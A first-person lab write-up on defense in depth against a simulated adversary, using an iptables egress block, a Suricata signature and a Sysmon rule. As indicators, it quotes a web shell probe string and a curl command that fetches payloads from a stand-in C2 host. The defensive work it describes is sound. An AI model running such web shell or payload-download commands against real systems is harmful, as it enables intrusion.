In this final operation, I moved beyond deploying single-point security solutions and architected a true Defense in Depth strategy. Relying on a single firewall or a single antivirus tool is a fragile approach; if an adversary bypasses that one wall, the entire network falls. To counter this, I implemented three independent, overlapping layers of security (Network Firewall, Network IDS, and Endpoint EDR). This ensures that if the attacker successfully evades one layer, the subsequent layers act as failsafes to detect and neutralize the threat.

2. The Problem I Faced in the Lab
I was tasked with defending an infrastructure against an active, sophisticated adversary. Threat intelligence indicated the attacker was exploiting web servers using a specific web shell command (cmd=whoami), communicating with a known Command and Control (C2) subnet (198.51.100.0/24), and downloading secondary post-exploitation payloads to the server via curl http://198.51.100.5. My challenge was to break the attacker's "kill chain" at multiple stages simultaneously, ensuring they could neither enter undetected nor establish a foothold if they did.

3. What I Looked For
I looked for opportunities to disrupt the adversary's specific tactics, techniques, and procedures (TTPs) at different layers of the OSI model:

At the Network Perimeter: I looked for the specific IP range the attacker used to control their malware, knowing that severing this connection would render their attacks useless.

On the Wire: I looked for the exact, unencrypted exploit string (cmd=whoami) traversing the network destined for our web server.

On the Endpoint: I looked for the behavioral signature of the payload download (curl http://198.51.100.5) executing natively in the Linux operating system memory.

4. The Commands I Ran and Why
To build this fortress, I engineered three specific rules across three different security engines:

Layer 1 (The Firewall): I executed iptables -A OUTPUT -d 198.51.100.0/24 -j DROP. I used this to implement egress filtering. Instead of just blocking incoming attacks, I explicitly blocked all outbound traffic from our servers to the attacker's C2 subnet, cutting off their ability to remotely control any compromised machines.

Layer 2 (The Tripwire): I wrote the Suricata IDS signature alert tcp any any -> any 80 (msg:"Web Shell Execution Detected"; content:"cmd=whoami"; sid:1000001; rev:1;). I deployed this to perform deep packet inspection. Because firewalls must allow port 80 traffic for web servers to function, I needed this IDS rule to look inside the allowed traffic and alert me the millisecond the specific exploit string crossed the wire.

Layer 3 (The Endpoint): I engineered the Sysmon XML policy <CommandLine condition="contains">curl http://198.51.100.5</CommandLine>. I implemented this because network traffic can sometimes be obfuscated or encrypted, blinding the IDS. By monitoring Event ID 1 (Process Creation) directly on the endpoint kernel, I ensured that if the command was executed by the CPU, it would be caught, regardless of how it entered the network.

5. Remediation Strategy
My remediation strategy was architectural resilience. I did not just fix a single vulnerability; I built a layered defense matrix. By combining perimeter access controls (iptables), signature-based network detection (Suricata), and behavioral endpoint monitoring (Sysmon), I severely increased the cost and complexity for any adversary attempting to compromise the infrastructure. If they encrypt their web shell to bypass the IDS, the Sysmon EDR will catch the payload execution. If they obfuscate the payload execution, the egress firewall will prevent the malware from calling home. This is the essence of modern cybersecurity operations.
